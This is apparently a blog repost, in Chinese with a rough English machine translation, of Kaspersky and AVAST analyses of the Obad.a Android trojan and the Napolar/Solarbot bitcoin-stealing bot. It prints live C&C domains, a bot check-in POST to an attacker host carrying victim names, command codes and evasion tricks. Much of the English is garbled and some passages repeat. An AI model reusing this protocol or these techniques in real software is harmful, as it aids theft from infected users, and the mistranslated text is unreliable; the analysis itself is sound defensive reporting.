傳播的手機木馬"!!和
--2).在網絡中的新型木馬'比特幣'的貪婪惡行-->化身病毒插件運行''
--Win32/64-Napolar(正在熱烈發生中...)=
--請小心防範此兇惡之''比特幣''-- <>--潜藏於任何陌生性的病毒插件.
..詳見內文... "!!
-USA(en)-'' Computer / phone information sharing - 1) by the - Kaspersky found * - '' The first use of botnets - > phones spread Trojans "
and ! ! - 2 ) new Trojan in the network ' bitcoin ' greedy evil - >
incarnation virus plug- run '' --Win32/64-Napolar --
--( Being warm occurrence ... ) = Please be careful to prevent
this evil of bitcoins '' -<>- Potential of the virus in any strange plugins .. ...See the text ..."!!
*''電腦/手机的資訊分享--1).由-卡巴斯基發現*
--''首個利用殭屍網絡-->傳播的手機木馬"!!和
--2).在網絡中的新型木馬'比特幣'的貪婪惡行-->化身病毒插件運行''
--Win32/64-Napolar(正在熱烈發生中...)=
請小心防範此兇惡之''比特幣''--
--潜藏於任何陌生性的病毒插件..詳見內文...
據報導,在過去3個月中,
卡巴斯基實驗室的專家一直在---
--對一種被稱為Obad.a木馬的安卓惡意應用--
--的傳播手段進行調查。
調查顯示,該木馬幕後的網絡罪犯--
--使用了一種全新的感染手段對該--
--惡意軟件進行傳播。
這也是手機網絡犯罪歷史上,
首個利用其他網絡犯罪集團--
--掌控的殭屍網絡進行傳播的木馬程序。
目前,Obad在CIS(獨聯體)國家傳播最為廣泛,
其中83%的感染均發生在俄羅斯。
此外,烏克蘭、白俄羅斯、
烏茲別克斯坦和哈薩克斯坦等國家的--
--移動設備上同樣檢測到這一木馬。
調查顯示,
Obad的多種版本採用了一種有趣的傳播模式,
即利用Trojan----SMS.AndroidOS.Opfake.a進行傳播。
這種雙重感染手段一般--
--通過向用戶發送短信來進行。
短信會提示用戶下載一個最新收到的短信息。
如果受害者點擊了短信鏈接,
會自下載動一個包含Opfake的文件--
--到用戶智能手機和平板電腦。
而用戶啟動該惡意文件,
惡意程序就會安裝。
一旦其成功運行,
木馬會向被感染設備中的所有聯繫人發送短信。
如果接收到這些短信的用戶點擊其中的鏈接,
就會下載Obad.a木馬。
這是一種非常有效的傳播系統。
一家俄羅斯移動網絡供應商聲稱,
僅在5小時內,網絡內就出現超過--
--600條包含此類惡意鏈接的短信,
這表明其傳播規模非常可觀。
大多數情況下,
該惡意軟件會利用已經被感染的設備進行傳播。
除了利用手機殭屍網絡進行傳播外,
這種高度複雜的木馬還能夠--
--通過垃圾短信進行傳播。
這也是Obad.a木馬的主要傳播途徑。
通常,手機用戶會接收到一條提示用戶“欠費”的短信,
如果用戶點擊了其中的鏈接,
便會自動下載Obad.a到移動設備。
同樣地,只有用戶運行下載文件,
才會將木馬安裝到設備上。
與此同時,
一些假冒的應用商店同樣會--
--傳播Backdoor.AndroidOS.Obad.a。
這些在線應用商店會抄襲Google Play的頁面,
並將其中的合法應用鏈接替換為惡意應用鏈接。
當合法網站被黑客攻陷後,
用戶就會被重定向到惡意網站。
Obad.a僅針對移動用戶發起攻擊,
如果用戶使用家用計算機訪問惡意網站,
則什麼都不會發生。
但是如果使用移動操作系統的--
--智能手機和平板電腦訪問,
即會被重定向到假冒的惡意網站(
目前只有安卓用戶面臨感染風險)。
“3個月期間,我們共發現12種不同版本--
--的Backdoor.AndroidOS.Obad.a。
這些惡意程序全都具有相似的功能--
--以及較高水平的干擾代碼。
每個版本的惡意程序都會利用安卓操作系統的漏洞,
使得惡意軟件具備設備管理員權限,
使得清除非常困難。
發現上述情況後,
我們立即通知了Google公司。
Google已經在安卓4.3中修補了上述安全漏洞。
但是,現在只有少數最新的智能手機和--
--平板電腦運行這一版本的安卓系統,
運行較早版本安卓系統的設備仍然面臨風險。
同其他安卓木馬不同,
Obad.a使用大量未公佈的漏洞進行感染,
這一點與Windows惡意軟件非常相似,
'”卡巴斯基實驗室頂級反病毒專家Roman Unuchek解釋說--
--如需了解更多關於Obad.a的傳播手段詳情,
請訪問 securelist.com.
[近期,卡巴斯基安全軟件安卓版已經上市,
它可以同時保護安卓智能手機和平板電腦設備,
使用相關設備的網友不妨下載試用下。]
--------------------------------------------------------------------------------------------- *USA9en)-*According to reports, in the past three months,
Kaspersky Lab experts have been ---
- On what is called a Trojan Andrews Obad.a malicious applications -
- Means of communication for investigation.
Investigation revealed that cybercriminals behind the Trojan -
- Use a new means of infection for the -
- The spread of malicious software .
It is also a crime in the history of the mobile phone network ,
The first use of other network crime syndicates -
- Control the spread of botnet Trojans .
Currently , Obad in the CIS ( Commonwealth of Independent States ) countries the most widely spread ,
83 % of infections occurred in Russia.
In addition , Ukraine, Belarus,
Uzbekistan and Kazakhstan, and other countries -
- The mobile device detects that the same horse .
Survey shows
Using multiple versions Obad an interesting mode of transmission ,
Namely the use of Trojan ---- SMS.AndroidOS.Opfake.a spread.
This dual infection means general -
- By sending an SMS to the user to carry out.
SMS text message prompts the user to download the latest received.
If the victim clicks the message link ,
Will move from the download of a file containing Opfake -
- To users of smart phones and tablet PCs .
The user launches the malicious file ,
Malicious programs will be installed.
Once its successful operation ,
Trojan sends infected messages to all contacts in the device .
If you receive these messages a user clicks on a link ,
Trojan will download Obad.a .
This is a very efficient communication systems.
A Russian mobile network provider claims ,
Only within 5 hours , over a network to appear -
- 600 text messages containing such malicious links ,
This suggests that the scale of its spread is very impressive.
In most cases,
The malware has infected devices use spread .
In addition to using botnets to spread outside of the phone ,
This highly sophisticated Trojan also -
- Spread through spam messages .
This is also the main route of transmission Obad.a Trojans .
Typically, mobile phone users will receive a prompt the user to "delinquent ," the message ,
If the user clicks on a link ,
Obad.a will automatically download to your mobile device .
Likewise, only the user run the downloaded file ,
Trojan will be installed on the device .
At the same time ,
Some fake application store will also -
- Spread Backdoor.AndroidOS.Obad.a.
These online application store will be copied Google Play page
And replace one of the legitimate application links to a malicious application link.
When legitimate sites are hacked ,
The user will be redirected to a malicious Web site .
Obad.a attack only for mobile users,
If you use your home computer to visit a malicious Web site ,
Then nothing will happen .
But if you use a mobile operating system -
- Access to smart phones and tablet PCs ,
That will be redirected to the fake malicious website (
Currently only Android users face the risk of infection ) .
" Three -month period , we found a total of 12 different versions -
- The Backdoor.AndroidOS.Obad.a.
These malicious programs all have similar functionality -
- And high interference level code.
Each version of the malicious program will use the Android operating system vulnerabilities ,
Making equipment have administrator privileges malware ,
Makes clear very difficult.
Found that the above situation,
We immediately notified the Google company .
Google has Android 4.3 fixes these vulnerabilities .
But now, only a handful of the latest smartphones and -
- Tablet PC running this version of the Android system ,
Android devices running earlier versions of the system are still at risk.
Different with other Android Trojans ,
Obad.a use a lot of unpublished vulnerabilities infection,
This is very similar to the Windows Malicious Software ,
' " Kaspersky Lab 's top anti-virus expert Roman Unuchek explains -
- For more details about Obad.a means of communication ,
Please visit securelist.com.
[ Recently, the Android version of Kaspersky security software already on the market ,
It can protect both Android smartphones and tablet devices ,
The use of related equipment users may wish to download a trial under . ]
-------------------------------------------------- -------------------------------------------*在最近幾個星期裡的AVAST惡意樣本分析名單中,
Win32/64:Napolar擁有極高的文件和網絡屏蔽率。
另外,我們發現了被冠以Solarbot名稱的新型木馬--
--於2013年5月左右開始做出其相關宣傳廣告,
而這種廣告並沒有發佈在大家經常訪問的黑客論壇,
而是在由主流搜索引擎索引一個叫solarbot.net的網站,
它擁有一個非常專業的外觀設計.*
*Analysis of samples of malicious AVAST list in recent weeks , the
Win32/64: Napolar has a high rate of file and network shield .
In addition, we found that the new name was called Solarbot Trojan -
- In about May 2013 began to make its related advertising,
And this kind of advertising , and we do not publish frequently visited hacker forums
But by the major search engines index a website called solarbot.net ,
It has a very professional design .*
*對於Win32/64:Napolar木馬,
它的進程間通信管道名稱是\\.\pipe\napSolar。
再加上存在的類似“CHROME.DLL”、
“OPERA.DLL”、“trusteer”、
“data_inject”等字符串,
以及後面會提到的功能特徵,
因此我們確定它和Solarbot間存在某種關聯。
讓我們來看看下面的分析。
Dropper
該文件最初以自解壓的壓縮文件形式存在,
--以類似Photo_021-WWW.FACEBOOK.COM.exe --
--這樣的格式命名,
並執行2項工作:
靜默執行dropper以及展示類似下面的辣妹照片
(譯者註:馬賽克是人類文明進步最大的絆腳石):*
Its inter -process communication pipe name is \ \. \ Pipe \ napSolar.
Coupled with the presence of similar "CHROME.DLL",
"OPERA.DLL", "trusteer",
"Data_inject" such as strings ,
And functional characteristics will be mentioned later ,
Therefore, we determine the existence of an association between it and Solarbot.
Let us look at the following analysis .
Dropper
This document was originally self-extracting compressed file exists ,
- In a similar Photo_021-WWW.FACEBOOK.COM.exe -
- This format is named ,
And perform two tasks:
Silent perform and display similar to the following dropper babes photos
( Translator's Note : Mosaic is the biggest stumbling block to the progress of human civilization ) :
**作者*的聲明中宣稱''Solarbot--
--由Free Pascal的Lazarus IDE所編寫,
但我們想不出任何專業或者--
--商業性質的木馬有此類似特點。
從另一個角度來講,
我們不能確定該代碼是否用Free Pascal編寫的,
因為它PE頭部的許多信息--
--都不同於一般的用Free Pascal編譯的二進製文件。
*核心可執行文件的結構如下:
** Author * statement claiming '' Solarbot -
- Written by the Free Pascal 's Lazarus IDE,
But we can not think of any professional or -
- Commercial nature of this Trojan have similar characteristics .
From another perspective,
We can not determine whether the code is written using Free Pascal ,
Because many of its PE header information -
- Are different from the general use Free Pascal compiler binaries.
Structural core executable file is as follows :
*x86初始的部分,
同時也用於識別系統的體系結構。
而在64位系統中,
還有一個通信模塊被解壓和加載。
LDE64(長度反彙編引擎)是一個32位--
--基於BeaEngine下的官方工具,
它能夠進行32位和64位架構指令解碼。
對於系統函數的修改來說--
--反彙編工作必不可少.
(確保成功的掛鉤一個定制的或模擬的源代碼塊)。
如網站廣告中提到的,
KERNEL32.DLL、NTDLL.DLL、
WININET.DLL、SHLWAPI.DLL、
PASPI.DLL中的所有重要函數都--
--進行了CRC32哈希處理.
(CRC32哈希常數表結構地址在0xFF395A)--
--並將其儲存在''虛擬''表單中。
與IsDebuggerPresent、
OutputDebugString函數相關的--
--反調試技巧也在此有所體現。
安裝到%AppData\lsass.exe後,
在新申請的內存空間0xFE0000處開始運行,
之後bot會自行關閉,
這意味著它不會在進程列表中被發現。
為了了解被這種木馬感染的地區分佈情況,
我們分析了相關檢測部分的運行狀況。
結果表明,每天至少有幾百台計算機被感染,
而這個數字相對於全部Solarbot樣本來講數量略多。
受到感染影響最嚴重的區域為中南美的哥倫比亞、
委內瑞拉、秘魯、墨西哥、
阿根廷以及亞洲的菲利賓、
越南和歐洲的波蘭。
x86 initial portion ,
Also used to identify the architecture of the system .
In 64-bit systems ,
There is also a communication module is unpacked and loaded.
LDE64 ( length disassembly engine ) is a 32 -
- Based on official tool BeaEngine under
It is capable of 32-bit and 64-bit architectures instruction decoding.
To modify the system function is concerned -
- Disassembly work is essential .
( Ensure the success of a custom hook or simulated source code blocks ) .
As mentioned in the website advertising ,
KERNEL32.DLL, NTDLL.DLL,
WININET.DLL, SHLWAPI.DLL,
PASPI.DLL all important functions -
- Were CRC32 hashing .
(CRC32 hash table structure constant address 0xFF395A) -
- And store it in the '' virtual '' form.
And IsDebuggerPresent,
OutputDebugString function related -
- Anti- debugging techniques are also reflected here .
After installing the % AppData \ lsass.exe,
Start running a new application memory space 0xFE0000 Department
After the bot will turn itself off ,
This means that it will not be found in the process list .
In order to understand by this Trojan infection geographical distribution ,
We analyzed the correlation detection part of the operating conditions .
The results show that there are at least hundreds of daily computer is infected,
And this figure is concerned relative to the total number of samples Solarbot slightly more .
Regions most affected by the infection of Central America , Colombia ,
Venezuela, Peru , Mexico,
Argentina, as well as in Asia and Philippines ,
Vietnam and Poland in Europe .*
*x86 initial portion ,
Also used to identify the architecture of the system .
In 64-bit systems ,
There is also a communication module is unpacked and loaded.
LDE64 ( length disassembly engine ) is a 32 -
- Based on official tool BeaEngine under
It is capable of 32-bit and 64-bit architectures instruction decoding.
To modify the system function is concerned -
- Disassembly work is essential .
( Ensure the success of a custom hook or simulated source code blocks ) .
As mentioned in the website advertising ,
KERNEL32.DLL, NTDLL.DLL,
WININET.DLL, SHLWAPI.DLL,
PASPI.DLL all important functions -
- Were CRC32 hashing .
(CRC32 hash table structure constant address 0xFF395A) -
- And store it in the '' virtual '' form.
And IsDebuggerPresent,
OutputDebugString function related -
- Anti- debugging techniques are also reflected here .
After installing the % AppData \ lsass.exe,
Start running a new application memory space 0xFE0000 Department
After the bot will turn itself off ,
This means that it will not be found in the process list .
In order to understand by this Trojan infection geographical distribution ,
We analyzed the correlation detection part of the operating conditions .
The results show that there are at least hundreds of daily computer is infected,
And this figure is concerned relative to the total number of samples Solarbot slightly more .
Regions most affected by the infection of Central America , Colombia ,
Venezuela, Peru , Mexico,
Argentina, as well as in Asia and Philippines ,
Vietnam and Poland in Europe .*
目前發現的C&C服務器有:
xyz25.com、cmeef.info、paloshke.org。
而後者註冊於臭名昭著的Bizcn.com公司。
我們曾在博客中提到的一款虛假修復工具=
=即註冊在這家具有欺詐性質的中國註冊商下。
廣告站solarbot.net的註冊信息如下:
Domain Name: SOLARBOT.NET
Registrar: NETEARTH ONE INC. D/B/A NETEARTH
Whois Server: whois.advancedregistrar.com
Referral URL: http://www.advancedregistrar.com
Name Server: NS1.BITCOIN-DNS.COM
Name Server: NS2.BITCOIN-DNS.COM
Status: clientTransferProhibited
Updated Date: 01-aug-2013
Creation Date: 01-aug-2013
Expiration Date: 01-aug-2014
註冊數據中聯繫信息被隱藏在PRIVACYPROTECT.ORG後面,
它吸引了眾多的涉及惡意活動的團體。
獲取執行命令的HTTP POST請求如下所示:
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.paloshke.org
Content-Length: 81
Pragma: no-cache
v=1.0&u=USER_NAME&c=COMP_NAME&s={7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}&w=2.5.1&b=32
其中s字符表示一個從受害人環境獲取的,
隨之生成的RC4解密密匙,v代表bot的版本,
數字1.0表示這個bot的初始開發階段。
在成功的請求了之後,會得到響應。
就像我們所提到的那樣,
它是由RC4進行加密的,
通過POST查詢字段發送未加密的正確密鑰。
響應結構採用以0分割的字符串數組的形式。
每個字符串開頭使用一個字節來表示指令號碼.
(已觀察到15個不同的指令),
--->再加上相應的字符串:
在連接延遲(指令0xC).
中是秒數(一般為3600);
對於下載命令(指令0×12),
是文件的URL地址、
控制哈希以及一個解密密鑰;
0×2指令安裝額外的文件WalletSteal.bin,
一個''比特幣錢包''的偷竊插件。
根據bitcoin.org,''比特幣錢包''相當於--->
--->''比特幣''網絡中的實體錢包,
它包含有允許用戶在''比特幣''交易中使用的密鑰。
實際上,這便是之前說的關於插件支持的例子!!@
插件加密放在%AppData中的臨時目錄SlrPlugin中。
特點--
以下特點列表就是在網站上所展示的:
*Communication Protocol -
Currently found in C & C servers are:
xyz25.com, cmeef.info, paloshke.org.
The latter company registered in the infamous Bizcn.com .
We have mentioned in a blog a false repair tool =
= That is registered in the fraudulent nature of this club registered under the Chinese .
Registration Information Advertising station solarbot.net follows :
Domain Name: SOLARBOT.NET
Registrar:. NETEARTH ONE INC D / B / A NETEARTH
Whois Server: whois.advancedregistrar.com
Referral URL: http://www.advancedregistrar.com
Name Server: NS1.BITCOIN-DNS.COM
Name Server: NS2.BITCOIN-DNS.COM
Status: clientTransferProhibited
Updated Date: 01-aug-2013
Creation Date: 01-aug-2013
Expiration Date: 01-aug-2014
Registration data contact information is hidden behind PRIVACYPROTECT.ORG,
It attracts a large number of organizations involved in malicious activities.
Get HTTP POST request to execute the command as follows:
POST / HTTP/1.1
Content-Type: application / x-www-form-urlencoded
User-Agent: Mozilla/4.0 (.... Compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; NET CLR 1.1.4322; NET CLR 2.0.50727; NET CLR 3.0.4506.2152; NET CLR 3.5.30729)
Host: www.paloshke.org
Content-Length: 81
Pragma: no-cache
v = 1.0 & u = USER_NAME & c = COMP_NAME & s = {7C79CE12-E753-D05E-0DE6-DFBF7B79CE12} & w = 2.5.1 & b = 32
Where s represents a character taken from the victim environment ,
Subsequently generated RC4 decryption key , v behalf bot version
Figure 1.0 represents the initial development phase of this bot .
After a successful request , and will get a response .
As we have mentioned,
It is RC4 encryption ,
Send unencrypted correct key by POST query field .
Response of the structure in the form of zero- delimited string array.
The beginning of each string using a byte to represent instruction number
( Has been observed 15 different instructions ) ,
--- > Together with the corresponding string :
In connection delay ( instruction 0xC).
Is the number of seconds ( typically 3600 ) ;
For the download command ( command 0 × 12),
Is the URL address of the file ,
Control hash and a decryption key ;
0 × 2 command to install additional files WalletSteal.bin,
A Bitcoin wallet '' '' theft plugins.
According bitcoin.org,'' '' bitcoin wallet equivalent --- >
--- >'' '' Bitcoin wallet network entities ,
It contains allows users to use '' in '' Bitcoin transaction key.
In fact , this is the case before you say about the plug-in support ! ! @
Plug-in encryption in % AppData in the temporary directory SlrPlugin .
Features -
The following is a list of features on the site are displayed :
*
我們已看到FTP和POP3掠奪,
反向Socks5或者基礎功能模塊的實現。
有相關的字符串
(“SSL”、“http://”、“https://”、web瀏覽器庫的名字、
“NSS layer”、“data_start”、“data_inject”、“data_end”)---
--反映了從瀏覽器發起攻擊的可能性。
確實,我們發現網絡銀行論壇的內容--
--以未加密的方法發送到--
--C&C服務器上,
但這僅在網站要求信譽或者--
--證書驗證時發生。
這可能和以下內置的URL列表有關:
https://urs.microsoft.com/urs.asmx
http://ocsp.verisign.com
http://ocsp.comodoca.com
http://safebrowsing.clients.google.com
http://dirpop.naver.com:8088/search.naver
而後通過內部指令0xF進行遠程更新。
接下來我們觀察到,
它下載了一個比特幣挖掘機,
並將其註入到系統臨時目錄的記事本文件中進行了執行.
(對應列表中的“MD5版本更新和系統下載”)。
最後,我們不得不說這個bot所展示的強悍的惡意能力,
再加上$200的合理價格,
近期很有可能大量湧現。
幸運的是,針對此的反病毒軟件將會應運而生,
使這些網絡犯罪種類更加的難以生存。
源代碼--
挑選的一些樣本的SHA256哈希值以及--
在AVAST引擎的覆蓋情況:
*
We have seen FTP and POP3 plunder,
Reverse Socks5 or implement basic functional modules .
String related
("SSL", "http://", "https://", web browser library name,
"NSS layer", "data_start", "data_inject", "data_end") ---
- Reflects the possibility of attack from the browser .
Indeed, we found that the content of online banking forum -
- Sending an unencrypted way to -
- The C & C server ,
But this site requires only reputation or -
- Occurs when the certificate validation.
This may be , and the following list of built-in URL :
https://urs.microsoft.com/urs.asmx
http://ocsp.verisign.com
http://ocsp.comodoca.com
http://safebrowsing.clients.google.com
http://dirpop.naver.com:8088/search.naver
Then through the internal instruction 0xF remotely update.
Next we observed
It downloaded a bitcoin excavators,
And injected into the system temporary directory Notepad file
has been executed.
( Corresponding to the list of "MD5 version update and
system download" ) .
Finally, we have to say that this bot malicious demonstrated
powerful capabilities,
Plus $ 200 for a reasonable price,
Recent likely in large numbers .
Fortunately, for this anti-virus software will come into being ,
Make more difficult to survive these types of cyber crime .
Source code -
Hash value selected some samples of SHA256 and -
AVAST engine in coverage :
*''電腦/手机的資訊分享--1).由-卡巴斯基發現* --''首個利用殭屍網絡-->
傳播的手機木馬"!!和
--2).在網絡中的新型木馬'比特幣'的貪婪惡行-->化身病毒插件運行''
--Win32/64-Napolar(正在熱烈發生中...)=
--請小心防範此兇惡之''比特幣''-- <>--潜藏於任何陌生性的病毒插件.
..詳見內文... "!!
-USA(en)-'' Computer / phone information sharing - 1) by the - Kaspersky found * - '' The first use of botnets - > phones spread Trojans "
and ! ! - 2 ) new Trojan in the network ' bitcoin ' greedy evil - >
incarnation virus plug- run '' --Win32/64-Napolar --
--( Being warm occurrence ... ) = Please be careful to prevent
this evil of bitcoins '' -<>- Potential of the virus in any strange plugins .. ...See the text ..."!!
===Melody.Blog===THE END===>/
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
*
沒有留言:
張貼留言
if you like make fds, wellcome you here~~anytime***
my free place for everyones who want the good software,
come & download them~ wellcome!!